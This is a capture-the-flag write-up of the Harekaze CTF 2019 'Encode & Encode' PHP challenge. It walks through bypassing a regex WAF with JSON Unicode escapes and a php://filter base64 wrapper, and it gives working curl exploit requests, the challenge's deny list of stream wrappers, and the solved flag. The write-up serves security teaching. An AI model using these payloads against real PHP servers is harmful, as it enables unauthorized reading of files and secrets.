Harekaze CTF – Encode & Encode
(Part of a series of writeups from Harekaze CTF 2019.)
The challenge text reads:
I made a strong WAF, so you definitely can’t read the flag!
We are given the source code, a link to the website, and a subtle hint.
$ tree
.
├── chall
│   ├── index.html
│   ├── pages
│   │   ├── about.html
│   │   └── lorem.html
│   └── query.php
├── Dockerfile
└── php.ini
2 directories, 6 files
The Dockerfile describes the environment the webapp runs in, so it's worth a look first.
FROM php:7.3-apache
COPY ./php.ini $PHP_INI_DIR/php.ini
COPY ./chall /var/www/html
RUN echo "HarekazeCTF{<redacted>}" > /flag
EXPOSE 80
The RUN ... > /flag line tells us that the flag is in a file called flag at the root of the filesystem, a handy thing to know.
Clicking on the link reveals a beautiful modern design.
JavaScript on the index.html page intercepts clicks on About and Lorem Ipsum and performs a JSON POST request to query.php, asking for the contents of page.
window.addEventListener('DOMContentLoaded', () => {
  let content = document.getElementById('content');
  for (let link of document.getElementsByClassName('link')) {
    link.addEventListener('click', () => {
      fetch('query.php', {
        'method': 'POST',
        'headers': {
          'Content-Type': 'application/json'
        },
        'body': JSON.stringify({
          'page': link.href.split('#')[1]
        })
      }).then(resp => resp.json()).then(resp => {
        content.innerHTML = resp.content;
      })
      return false;
    }, false);
  }
}, false);
On the server side, query.php handles the request and serves the response with a suspicious-looking call to file_get_contents.
<?php
error_reporting(0);
if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}
function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}
$body = file_get_contents('php://input');
$json = json_decode($body, true);
if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}
// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i',
  'HarekazeCTF{<censored>}', $content);
echo json_encode(['content' => $content]);
PHP has a habit of doing too much at once, so innocent-looking code can end up doing something unexpected. PHP's stream, protocol, and fopen wrappers are often the culprits. Generally, if untrusted input can find its way into file_get_contents, you are probably in trouble.
Despite the author's attempts to mitigate path traversal and data exfiltration, they've made some fatal errors that will ultimately let us steal the flag.
Our eyes are drawn to the following sloppiness.
$body = file_get_contents('php://input');
$json = json_decode($body, true);
if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  // ...
}
The issue here is premature validation. The is_valid function is applied to $body before it goes through json_decode, not afterwards.
JSON decoding processes escape sequences, so if escape sequences can be used to obfuscate the input, the raw text passes validation while the final (decoded) string is unaffected.
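The effect of validating before decoding can be reproduced outside PHP. The sketch below is a hypothetical JavaScript port of is_valid (the name isValid and the sample body are illustrative and not part of the challenge). It relies on a JSON escape sequence to hide one letter: the raw body passes the filter, yet the decoded value contains a banned word.

```javascript
// Hypothetical port of the challenge's is_valid() regex, for illustration only.
const BANNED = /\.\.|(php|file|glob|data|tp|zip|zlib|phar):|flag/i;

function isValid(str) {
  return !BANNED.test(str);
}

// Raw request body as it travels over the wire: the "a" is written as \u0061.
const rawBody = String.raw`{"page":"/fl\u0061g"}`;

// The WAF inspects the raw text, which never contains the literal word "flag"...
const passesWaf = isValid(rawBody);

// ...but decoding turns the escape back into a plain character.
const decodedPage = JSON.parse(rawBody).page;

console.log(passesWaf);            // true
console.log(decodedPage);          // /flag
console.log(isValid(decodedPage)); // false
```

Running the check on the decoded value instead of the raw body would have caught this input.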
Let's look at the JSON specification's definition for a string.
JSON supports Unicode escapes of the form \uXXXX, where XXXX is the four hex digits of the character's Unicode code point (characters outside the Basic Multilingual Plane are written as a surrogate pair).
For example, the letter A is 0x41 and is represented as \u0041.
$ echo '{ "page": "\u0041\u0041\u0041\u0041" }' | jq
{
  "page": "AAAA"
}
The tool uni2ascii can convert ASCII text to Unicode escapes.
$ echo '/flag' | uni2ascii -qpa L
\u002F\u0066\u006C\u0061\u0067
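If uni2ascii is not at hand, the same conversion is easy to sketch by hand. The helper below (toUnicodeEscapes is a hypothetical name, not from the challenge) escapes every UTF-16 code unit of its input, which is the unit JSON's \uXXXX escape works in, and then wraps the result in a request body.

```javascript
// Minimal sketch: rewrite every UTF-16 code unit of a string as a JSON \uXXXX escape.
function toUnicodeEscapes(text) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const hex = text.charCodeAt(i).toString(16).toUpperCase().padStart(4, '0');
    out += '\\u' + hex;
  }
  return out;
}

const escaped = toUnicodeEscapes('/flag');
console.log(escaped); // \u002F\u0066\u006C\u0061\u0067

// Wrap the escaped path in a JSON body; decoding it restores the original path.
const body = '{"page":"' + escaped + '"}';
console.log(JSON.parse(body).page); // /flag
```

Escaping every character is more than strictly necessary, but it means no banned word or wrapper prefix can survive in the raw body.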
Armed with our obfuscated payload, all that's left to do is POST the request to read /flag, and we should be done.
$ curl -X POST \
-d "{\"page\":\"\u002F\u0066\u006C\u0061\u0067\"}" \
-H 'Content-Type: application/json' \
$HOST/query.php
{"content":"HarekazeCTF{<censored>}\n"}
Oh, wait, there's that part of the code that filters the content on the way out.
// no data exfiltration!!!
$content = preg_replace(
  '/HarekazeCTF\{.+\}/i',
  'HarekazeCTF{<censored>}',
  $content
);
As mentioned earlier, where untrusted user input reaches file_get_contents, there's room to use a PHP stream wrapper that does crazy things which happen to help us in unexpected ways.
A little bit of research revealed that there is a wrapper called php://filter that can not only read files, but also convert them to base64 strings!
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior to the contents being read.
Useful.
So, the final payload becomes...
php://filter/convert.base64-encode/resource=/flag
When this is passed directly to file_get_contents, PHP will read /flag and convert it to a base64-encoded string, thus bypassing the final layer of protection.
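To see why the encoded output slips through, the sketch below replays the two outbound checks in JavaScript against both forms of a flag file. The regexes are transcribed from query.php; the placeholder flag value, the names BANNED and censor, and the use of Node's Buffer are assumptions made for illustration.

```javascript
// Placeholder stand-in for /flag (not the real flag); echo adds the trailing newline.
const flagFile = 'HarekazeCTF{dummy_value}\n';

// Outbound checks transcribed from query.php (hypothetical JavaScript port).
const BANNED = /\.\.|(php|file|glob|data|tp|zip|zlib|phar):|flag/i;
const censor = (s) => s.replace(/HarekazeCTF\{.+\}/i, 'HarekazeCTF{<censored>}');

// Reading /flag directly: the flag pattern is rewritten before it reaches us.
const plain = censor(flagFile);

// Reading via convert.base64-encode: neither regex recognises the encoded text.
const encoded = Buffer.from(flagFile, 'utf8').toString('base64');
const leaked = censor(encoded);

console.log(plain.trim());         // HarekazeCTF{<censored>}
console.log(BANNED.test(encoded)); // false
console.log(leaked === encoded);   // true

// Decoding on our side recovers the original file contents.
const recovered = Buffer.from(leaked, 'base64').toString('utf8');
console.log(recovered === flagFile); // true
```

Both outbound filters match on literal text, so any reversible encoding applied before they run is enough to get past them.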
$ curl -X POST \
-d "{\"page\":\"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067\"}" \
-H 'Content-Type: application/json' \
$HOST/query.php
{"content":"SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg=="}
The response is base64-encoded, so the last step is to decode it.
$ echo 'SGFyZWthemVDVEZ7dHVydXRhcmFfdGF0dGF0dGFfcml0dGF9Cg==' | base64 -d
HarekazeCTF{turutara_tattatta_ritta}